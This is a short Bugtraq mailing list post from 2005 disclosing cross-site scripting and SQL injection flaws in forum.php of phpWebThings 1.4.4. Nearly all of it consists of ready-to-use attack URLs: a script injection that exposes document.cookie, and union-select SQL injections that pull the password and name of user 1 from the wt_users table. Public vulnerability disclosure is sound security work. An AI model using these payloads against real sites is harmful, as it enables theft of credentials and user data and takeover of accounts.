Bugtraq mailing list archives
XSS & SQL injection in phpWebThing
From: xx_hack_xx_2004 () hotmail com
Date: 5 Nov 2005 03:00:11 -0000
Vulnerable: phpWebThings 1.4.4 http://phpwebthings.org The bug reside in : forum.php Exploit : http://xxx.com/forum.php?forum=[XSS] http://xxx.com/forum.php?forum=[SQL] Example : XSS http://xxx.com/forum.php?forum='><script>alert(document.cookie)</script> SQL For Passowrd http://xxx.com/forum.php?forum=-1 union select password,password,null,null,null,null from wt_users where uid=1/* For Name http://xxx.com/forum.php?forum=-1 union select name,name,null,null,null,null from wt_users where uid=1/* Discovery by Linux_Drox http://www.lezr.com Best Regards
Current thread:
- XSS & SQL injection in phpWebThing xx_hack_xx_2004 (Nov 05)